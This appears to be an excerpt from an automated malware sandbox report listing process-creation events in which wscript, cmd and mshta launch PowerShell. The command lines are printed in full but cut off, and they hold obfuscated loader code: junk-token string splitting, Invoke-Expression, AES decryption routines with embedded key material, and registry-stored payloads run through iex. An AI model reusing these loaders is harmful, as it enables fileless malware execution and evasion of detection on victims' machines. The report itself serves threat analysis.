                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function Ib6pi([byte[]]$Sf4DZ) {Invoke-Expression -Verbose -WarningAction Inquire -Debug 'O2o$O2ocO2oqO2o1O2oaO2oGO2o=O2o[O2oSO2oyO2osO2otO2oeO2omO2o.O2oTO2oeO2oxO2otO2o.O2oEO2onO2ocO2ooO2odO2oiO2onO2ogO2o]O2o:O2o:O2oUO2oTO2oFO2o8O2o.O2oGO2oeO2otO2oSO2otO2orO2oiO2onO2ogO2o(O2o$O2oSO2ofO2o4O2oDO2oZO2o)O2o'.Replace('O2o', ''); return $cq1aG; } function Smsgn([byte[]]$TYS1W) {Invoke-Expression -Verbose -InformationAction Ignore 'StI$StIrStIwStIZStIwStIHStI=StI[StIBStIiStItStICStIoStInStIvStIeStIrStItStIeStIrStI]StI:StI:StITStIoStIIStInStItStI3StI2StI(StI$StITStIYStISStI1StIWStI,StI0StI)StI;StI'.Replace('StI', ''); return $rwZwH; } $yOU0b = Ib6pi(0x74<#chvvk#>,0x52<#u2CEY#>,0x6B<#MVTFN#>,0x58<#YiCr7#>,0x43<#K8mg9#>,0x36<#UhqQ4#>,0x6A<#cQm2O#>,0x2B<#flcxM#>,0x34<#OY2RT#>,0x5A<#ALzz6#>,0x6F<#zoKd3#>,0x52<#d4OvL#>,0x59<#SLwJ0#>,0x62<#zsa1m#>,0x79<#sFOep#>,0x47<#qGVN9#>,0x70<#Ks1U4#>,0x6F<#uGJ9p#>,0x4D<#kWql0#>,0x45<#EmsaU#>,0x75<#Ov8NF#>,0x6B<#uZpyF#>,0x6B<#XiBw9#>,0x43<#hUbO7#>,0x59<#ujaL4#>,0x46<#ZYnnj#>,0x42<#JY42r#>,0x51<#WtnPA#>,0x34<#YaV4N#>,0x2F<#HV4mN#>,0x46<#nKdcb#>,0x79<#lUwSl#>,0x64<#awCO3#>,0x34<#CnIFi#>,0x58<#uqMOd#>,0x4F<#YNg7w#>,0x4B<#HeBay#>,0x4E<#A4cb9#>,0x58<#F6Vnf#>,0x78<#kXGAK#>,0x2B<#ZMzDT#>,0x45<#E8P88#>,0x67<#Zyzgc#>,0x3D<#Auma2#>); $pKdS6 = Ib6pi(0x4E<#HLrGc#>,0x47<#xVisw#>,0x30<#EHfxR#>,0x52<#wp7Gt#>,0x63<#Cpdce#>,0x50<#OHyLe#>,0x37<#xvqHB#>,0x49<#PetlW#>,0x36<#lZgM3#>,0x7A<#TTBOg#>,0x75<#Rxgr0#>,0x45<#YsPlK#>,0x65<#qhXNz#>,0x65<#QaXw9#>,0x6F<#W6Vt9#>,0x32<#gIQiG#>,0x46<#yGjpJ#>,0x6F<#HP9Ri#>,0x77<#dPHbh#>,0x72<#KCTWk#>,0x34<#x6PPE#>,0x51<#VbwrN#>,0x3D<#RcqfM#>,0x3D<#l7sEq#>); $mxwaP = Ib6pi(0x53<#DbFNZ#>,0x6F<#Jy4Lx#>,0x66<#ez47J#>,0x74<#B1Uku#>,0x77<#kcRDO#>,0x61<#GimOz#>,0x72<#MUPpg#>,0x65<#a0Bz2#>,0x5C<#ehl3n#>,0x4D<#ZitVL#>,0x69<#smHT8#>,0x63<#fJC9S#>,0x72<#hMqWi#>,0x6F<#NkObo#>,0x73<#IzfrK#>,0x6F<#J1Yat#>,0x66<#dzRC7#>,0x74<#fM5r5#>,0x5C<#RyBgP#>,0x57<#T0PUW#>,0x69<#vTRqA#>,0x6E<#BHZJx#>,0x64<#mvlQt#>,0x6F<#p5nY6#>,0x77<#DohgT#>,0x73<#Sx8cw#>); $RGohu = Ib6pi(0x6B<#QlDDy#>,0x70<#NhkB5#>,0x44<#Zww3K#>,0x53<#eNvxb#>,0x46<#XM0XT#>); $RwltO = Smsgn(0x00<#h5SFV#>,0x00<#ucupc#>,0x00<#MID9v#>,0x00<#HXOXF#>); $ewoV8 = $true; $jOK5y = $null; function Yz1Gd($VHgBC) {Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore 'CKA$CKAeCKAyCKAyCKAQCKAHCKA=CKA[CKASCKAyCKAsCKAtCKAeCKAmCKA.CKASCKAeCKAcCKAuCKArCKAiCKAtCKAyCKA.CKACCKArCKAyCKApCKAtCKAoCKAgCKArCKAaCKApCKAhCKAyCKA.CKAACKAeCKAsCKA]CKA:CKA:CKACCKArCKAeCKAaCKAtCKAeCKA(CKA)CKA'.Replace('CKA', ''); Invoke-Expression -WarningAction Inquire -Verbose 'RHv$RHveRHvyRHvyRHvQRHvHRHv.RHvMRHvoRHvdRHveRHv=RHv[RHvSRHvyRHvsRHvtRHveRHvmRHv.RHvSRHveRHvcRHvuRHvrRHviRHvtRHvyRHv.RHvCRHvrRHvyRHvpRHvtRHvoRHvgRHvrRHvaRHvpRHvhRHvyRHv.RHvCRHviRHvpRHvhRHveRHvrRHvMRHvoRHvdRHveRHv]RHv:RHv:RHvCRHvBRHvCRHv'.Replace('RHv', ''); Invoke-Expression -Verbose -DJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function IrUjV([byte[]]$f9mpX) {Invoke-Expression -Verbose -Debug -InformationAction Ignore 'zZO$zZOSzZOfzZOYzZOszZO9zZO=zZO[zZOSzZOyzZOszZOtzZOezZOmzZO.zZOTzZOezZOxzZOtzZO.zZOEzZOnzZOczZOozZOdzZOizZOnzZOgzZO]zZO:zZO:zZOUzZOTzZOFzZO8zZO.zZOGzZOezZOtzZOSzZOtzZOrzZOizZOnzZOgzZO(zZO$zZOfzZO9zZOmzZOpzZOXzZO)zZO'.Replace('zZO', ''); return $SfYs9; } function SsYTA([byte[]]$MyDKV) {Invoke-Expression -WarningAction Inquire -Verbose 'RzW$RzWGRzWwRzW1RzWMRzWHRzW=RzW[RzWBRzWiRzWtRzWCRzWoRzWnRzWvRzWeRzWrRzWtRzWeRzWrRzW]RzW:RzW:RzWTRzWoRzWIRzWnRzWtRzW3RzW2RzW(RzW$RzWMRzWyRzWDRzWKRzWVRzW,RzW0RzW)RzW;RzW'.Replace('RzW', ''); return $Gw1MH; } $MXyPq = IrUjV(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxMg = IrUjV(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gYqop = IrUjV(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $QR3m4 = IrUjV(0x4a, 0x6d, 106, 53, 121); $Q21ag = IrUjV(0x67, 0x69, 69, 99, 67); $u2Okr = SsYTA(0x00, 0, 0, 0x00); $dXs3R = $true; $gnS0E = $null; function juypb($gsleS) {Invoke-Expression -Debug -WarningAction Inquire 'Fs5$Fs5wFs5GFs52Fs5gFs5lFs5=Fs5[Fs5SFs5yFs5sFs5tFs5eFs5mFs5.Fs5SFs5eFs5cFs5uFs5rFs5iFs5tFs5yFs5.Fs5CFs5rFs5yFs5pFs5tFs5oFs5gFs5rFs5aFs5pFs5hFs5yFs5.Fs5AFs5eFs5sFs5]Fs5:Fs5:Fs5CFs5rFs5eFs5aFs5tFs5eFs5(Fs5)Fs5'.Replace('Fs5', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose 'hta$htawhtaGhta2htaghtalhta.htaMhtaohtadhtaehta=hta[htaShtayhtashtathtaehtamhta.htaShtaehtachtauhtarhtaihtathtayhta.htaChtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htaChtaihtaphtahhtaehtarhtaMhtaohtadhtaehta]hta:hta:htaChtaBhtaChta'.Replace('hta', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire 'RLY$RLYwRLYGRLY2RLYgRLYlRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLY=RLY[RLYSRLYyRLYsRLYtRLYeRLYmRLY.RLYSRLYeRLYcRLYuRLYrRLYiRLYtRLYyRLY.RLYCRLYrRLYyRLYpRLYtRLYoRLYgRLYrRLYaRLYpRLYhRLYyRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLYMRLYoRLYdRLYeRLY]RLY:RLY:RLYPRLYKRLYCRLYSRLY7RLY'.Replace('RLY', ''); Invoke-Expression -WarningAction Inquire -Verbose 'MnG$MnGwMnGGMnG2MnGgMnGlMnG.MnGKMnGeMnGyMnG=MnG[MnGSMnGyMnGsMnGtMnGeMnGmMnG.MnGCMnGoMnGnMnGvMnGeMnGrMnGtMnG]MnG:MnG:MnGFMnGrMnGoMnGmMnGBMnGaMnGsMnGeMnG6MnG4MnGSMnGtMnGrMnGiMnGnMnGgMnG(MnG$MnGMMnGXMnGyMnGPMnGqMnG)MnG'.Replace('MnG', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'BNK$BNKwBNKGBNK2BNKgBNKlBNK.BNKIBNKVBNK=BNK[BNKSBNKyBNKsBNKtBNKeBNKmBNK.BNKCBNKoBNKnBNKvBNKeBNKrBNKtBNK]BNK:BNK:BNKFBNKrBNKoBNKmBNKBBNKaBNKsBNKeBNK6BNK4BNKSBNKtBNKrBNKiBNKnBNKgBNK(BNK$BNKlJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mrJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')Jump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c c:\windows\system32\windowspowershell\v1.0\powershell.exe -command "& {function it93g([byte[]]$e3oxu) {invoke-expression -debug -verbose 'h6m$h6mwh6mhh6mbh6m3h6m2h6m=h6m[h6msh6myh6msh6mth6meh6mmh6m.h6mth6meh6mxh6mth6m.h6meh6mnh6mch6moh6mdh6mih6mnh6mgh6m]h6m:h6m:h6muh6mth6mfh6m8h6m.h6mgh6meh6mth6msh6mth6mrh6mih6mnh6mgh6m(h6m$h6meh6m3h6moh6mxh6muh6m)h6m'.replace('h6m', ''); return $whb32; } function tiw6l([byte[]]$zuv5n) {invoke-expression -debug -warningaction inquire -verbose -informationaction ignore 'dtc$dtcqdtckdtcadtcgdtcidtc=dtc[dtcbdtcidtctdtccdtcodtcndtcvdtcedtcrdtctdtcedtcrdtc]dtc:dtc:dtctdtcodtcidtcndtctdtc3dtc2dtc(dtc$dtczdtcudtcvdtc5dtcndtc,dtc0dtc)dtc;dtc'.replace('dtc', ''); return $qkagi; } $h2oux = it93g(0x74<#agf8g#>,0x52<#sotvh#>,0x6b<#ijtfo#>,0x58<#aq0ez#>,0x43<#lryb0#>,0x36<#ldjca#>,0x6a<#drhtq#>,0x2b<#nxos5#>,0x34<#ajnvw#>,0x5a<#vkssp#>,0x6f<#nr7dj#>,0x52<#lsoi1#>,0x59<#pervd#>,0x62<#tlapz#>,0x79<#kbijz#>,0x47<#hncf5#>,0x70<#hu1xu#>,0x6f<#tuejh#>,0x4d<#cjg0h#>,0x45<#w2r2e#>,0x75<#qkdti#>,0x6b<#ljyd9#>,0x6b<#epinn#>,0x43<#yn4lf#>,0x59<#bh0r2#>,0x46<#bfrbe#>,0x42<#owjkm#>,0x51<#d0ipg#>,0x34<#pgajc#>,0x2f<#oktmn#>,0x46<#k7qw7#>,0x79<#ntwba#>,0x64<#lrwjs#>,0x34<#lp8kk#>,0x58<#gppfr#>,0x4f<#zhqok#>,0x4b<#xlpyw#>,0x4e<#qpxm0#>,0x58<#qdhox#>,0x78<#bubbt#>,0x2b<#gmsca#>,0x45<#csle7#>,0x67<#ldi0e#>,0x3d<#bmxwz#>); $qbags = it93g(0x4e<#c2vu0#>,0x47<#diarv#>,0x30<#mgpf7#>,0x52<#qdmxt#>,0x63<#aesom#>,0x50<#nfqkq#>,0x37<#uwobq#>,0x49<#mq8mb#>,0x36<#z2tts#>,0x7a<#gxc3u#>,0x75<#dzacy#>,0x45<#yjqhj#>,0x65<#drqb2#>,0x65<#tbnzn#>,0x6f<#cek6p#>,0x32<#hvj6e#>,0x46<#ycxzm#>,0x6f<#ywlmr#>,0x77<#ik0cx#>,0x72<#kls1z#>,0x34<#jknpr#>,0x51<#dzexq#>,0x3d<#kaung#>,0x3d<#f40yy#>); $zxcf8 = it93g(0x53<#b0lhd#>,0x6f<#ynhic#>,0x66<#bdsgx#>,0x74<#tossn#>,0x77<#hrywf#>,0x61<#i0n5w#>,0x72<#pudct#>,0x65<#r8glo#>,0x5c<#wrgut#>,0x4d<#lrnzo#>,0x69<#smhlu#>,0x63<#lcpm3#>,0x72<#galvu#>,0x6f<#oapw7#>,0x73<#uiger#>,0x6f<#svdmv#>,0x66<#tmxra#>,0x74<#enrsf#>,0x5c<#qtdsl#>,0x57<#aqua7#>,0x69<#lc02u#>,0x6e<#lgnex#>,0x64<#x9m0b#>,0x6f<#vc3vo#>,0x77<#htgri#>,0x73<#ioy3l#>); $hbkvc = it93g(0x73<#jbcod#>,0x31<#rvfxn#>,0x55<#zawun#>,0x6e<#qhnrl#>,0x62<#ywzwy#>); $b8dta = tiw6l(0x00<#a7hb6#>,0x00<#o0rd9#>,0x00<#jxcyj#>,0x00<#om184#>); $isxcm = tiw6l(0x45<#ood4n#>,0x00<#imgsk#>,0x00<#ylexb#>,0x00<#uuo0e#>); $l8xqf = tiw6l(0x03<#cqs75#>,0x00<#gs7w6#>,0x00<#gtblr#>,0x00<#o3nyw#>); $kzu3x = $null; function s2qwv($ti34n) {invoke-expression -verbose -debug -warningaction inquire 'bqr$bqrebqrlbqrpbqrtbqrfbqr=bqr[bqrsbqrybqrsbqrtbqrebqrmbqr.bqrsbqrebqrcbqrubqrrbqribqrtbqrybqr.bqrcbqrrbqrybqrpbqrtbqrobqrgbqrrbqrabqrpbqrhbqrybqr.bqrabqrebqrsbqr]bqr:bqr:bqrcbqrrbqrebqrabqrtbqrebqr(bqr)bqr;bqr'.replace('bqr', ''); invoke-expression -warningaction inquire -debug -informationaction ignore 'l3m$l3mel3mll3mpl3mtl3mfl3m.l3mml3mol3mdl3mel3m=l3m[l3msl3myl3msl3mtl3mel3mml3m.l3msl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mcl3mrl3myl3mpl3mtl3mol3mgl3
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe -command "& {function it93g([byte[]]$e3oxu) {invoke-expression -debug -verbose 'h6m$h6mwh6mhh6mbh6m3h6m2h6m=h6m[h6msh6myh6msh6mth6meh6mmh6m.h6mth6meh6mxh6mth6m.h6meh6mnh6mch6moh6mdh6mih6mnh6mgh6m]h6m:h6m:h6muh6mth6mfh6m8h6m.h6mgh6meh6mth6msh6mth6mrh6mih6mnh6mgh6m(h6m$h6meh6m3h6moh6mxh6muh6m)h6m'.replace('h6m', ''); return $whb32; } function tiw6l([byte[]]$zuv5n) {invoke-expression -debug -warningaction inquire -verbose -informationaction ignore 'dtc$dtcqdtckdtcadtcgdtcidtc=dtc[dtcbdtcidtctdtccdtcodtcndtcvdtcedtcrdtctdtcedtcrdtc]dtc:dtc:dtctdtcodtcidtcndtctdtc3dtc2dtc(dtc$dtczdtcudtcvdtc5dtcndtc,dtc0dtc)dtc;dtc'.replace('dtc', ''); return $qkagi; } $h2oux = it93g(0x74<#agf8g#>,0x52<#sotvh#>,0x6b<#ijtfo#>,0x58<#aq0ez#>,0x43<#lryb0#>,0x36<#ldjca#>,0x6a<#drhtq#>,0x2b<#nxos5#>,0x34<#ajnvw#>,0x5a<#vkssp#>,0x6f<#nr7dj#>,0x52<#lsoi1#>,0x59<#pervd#>,0x62<#tlapz#>,0x79<#kbijz#>,0x47<#hncf5#>,0x70<#hu1xu#>,0x6f<#tuejh#>,0x4d<#cjg0h#>,0x45<#w2r2e#>,0x75<#qkdti#>,0x6b<#ljyd9#>,0x6b<#epinn#>,0x43<#yn4lf#>,0x59<#bh0r2#>,0x46<#bfrbe#>,0x42<#owjkm#>,0x51<#d0ipg#>,0x34<#pgajc#>,0x2f<#oktmn#>,0x46<#k7qw7#>,0x79<#ntwba#>,0x64<#lrwjs#>,0x34<#lp8kk#>,0x58<#gppfr#>,0x4f<#zhqok#>,0x4b<#xlpyw#>,0x4e<#qpxm0#>,0x58<#qdhox#>,0x78<#bubbt#>,0x2b<#gmsca#>,0x45<#csle7#>,0x67<#ldi0e#>,0x3d<#bmxwz#>); $qbags = it93g(0x4e<#c2vu0#>,0x47<#diarv#>,0x30<#mgpf7#>,0x52<#qdmxt#>,0x63<#aesom#>,0x50<#nfqkq#>,0x37<#uwobq#>,0x49<#mq8mb#>,0x36<#z2tts#>,0x7a<#gxc3u#>,0x75<#dzacy#>,0x45<#yjqhj#>,0x65<#drqb2#>,0x65<#tbnzn#>,0x6f<#cek6p#>,0x32<#hvj6e#>,0x46<#ycxzm#>,0x6f<#ywlmr#>,0x77<#ik0cx#>,0x72<#kls1z#>,0x34<#jknpr#>,0x51<#dzexq#>,0x3d<#kaung#>,0x3d<#f40yy#>); $zxcf8 = it93g(0x53<#b0lhd#>,0x6f<#ynhic#>,0x66<#bdsgx#>,0x74<#tossn#>,0x77<#hrywf#>,0x61<#i0n5w#>,0x72<#pudct#>,0x65<#r8glo#>,0x5c<#wrgut#>,0x4d<#lrnzo#>,0x69<#smhlu#>,0x63<#lcpm3#>,0x72<#galvu#>,0x6f<#oapw7#>,0x73<#uiger#>,0x6f<#svdmv#>,0x66<#tmxra#>,0x74<#enrsf#>,0x5c<#qtdsl#>,0x57<#aqua7#>,0x69<#lc02u#>,0x6e<#lgnex#>,0x64<#x9m0b#>,0x6f<#vc3vo#>,0x77<#htgri#>,0x73<#ioy3l#>); $hbkvc = it93g(0x73<#jbcod#>,0x31<#rvfxn#>,0x55<#zawun#>,0x6e<#qhnrl#>,0x62<#ywzwy#>); $b8dta = tiw6l(0x00<#a7hb6#>,0x00<#o0rd9#>,0x00<#jxcyj#>,0x00<#om184#>); $isxcm = tiw6l(0x45<#ood4n#>,0x00<#imgsk#>,0x00<#ylexb#>,0x00<#uuo0e#>); $l8xqf = 